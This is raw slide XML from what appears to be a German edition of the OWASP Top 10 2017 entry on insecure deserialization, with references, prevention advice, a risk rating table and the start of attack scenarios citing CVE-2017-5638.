            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId11"/>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CWE-502: Deserialization of Untrusted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Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Unmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t> Security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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> Cali 2015: Marshalling Pickles</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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Der einzig sichere Weg ist es keine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serialisierten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Objekte aus nicht vertrauenswürdigen Quellen anzunehmen oder nur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serialisierte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Datenstrukturen zu nutzen, die ausschließlich einfache Datentypen erlauben. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andernfalls ziehen Sie folgende Empfehlungen in Betracht:</a:t>
            </a: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Versehen Sie alle serialisierten Objekte mit einer digitalen Signatur, um so zu verhindern, dass bösartige Objekte erzeugt oder Daten manipuliert werden können.</a:t>
            </a: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Achten Sie auf eine strikte Typisierung während der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deseria-lisierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> und bevor Objekte erzeugt werden. Zumeist wird hier nur eine bekannte Menge an Klassen benötigt. Es wurde bereits gezeigt, das diese Maßnahme umgangen werden kann. Es ist daher nicht ratsam, sich alleine hierauf zu verlassen.</a:t>
            </a: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Isolieren Sie den für die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deserialiserung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> zuständigen Programmcode und führen Sie ihn in einer eigenen Umgebung mit möglichst geringen Berechtigungen aus.</a:t>
            </a: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Protokollieren Sie alle Ausnahmefehler, die bei der Deserialisierung auftreten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(z.B. unerwartete Objekt-Typen). </a:t>
            </a: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Begrenzen oder überwachen Sie ein- und ausgehende Netzwerkaktivitäten von Containern oder Servern, die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deserialisierungen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ausführen.</a:t>
            </a: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Überwachen und melden Sie, wenn ein Nutzer auffällig häufig eine Deserialisierung nutzt.</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A8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Unsichere Deserialisierung</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3926350227"/>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5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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="1">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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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de-DE" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Das Ausnutzen von </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fehlern in der Deserialisierung </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ist nicht</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> trivial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, zumal vorhandener Angriffscode selten ohne weitere Anpassungen einsetzbar ist.</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algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dieser Eintrag in den Top 10 basiert auf einer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Expertenumfrage in der Community</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und nicht auf messbaren Fallzahlen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einige Werkzeuge können </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Deserialisierungs-schwachstellen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> entdecken, allerdings ist häufig eine manuelle Überprüfung des Fundes nötig. Es ist zu erwarten, dass belastbareres Zahlenmaterial zur Verfügung stehen wird, sobald die Tools zur Erkennung weiter entwickelt sind.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" kern="1200" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>Die Auswirkungen von </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>Deserialisie-rungsfehlern</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t> sollten nicht unterschätzt werden. Diese Schwachstelle kann durchaus zu "Remote-Code </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>" </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>führen, einem der schwer-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>wiegendsten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t> Angriffe überhaupt.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans"/>
                          <a:sym typeface="Liberation Sans"/>
                        </a:rPr>
                        <a:t>
</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Auswirkungen auf das Unter-nehmen hängen vom Schutzbedarf der Anwendung und ihrer Daten ab.</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Mögliche Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Komponenten laufen typischerweise unter den selben Rechten wie die Anwendung selbst. Daher kann ein Fehler in einer beliebigen Komponente schwerwiegende Folgen haben. Solche Schwachstellen können sowohl durch ein Versehen (z.B. Programmierfehler) als auch vorsätzlich (z.B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) in eine Komponente gelangen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Einige gefundene und ausnutzbare Beispiele sind:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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4"/>
              </a:rPr>
              <a:t>CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
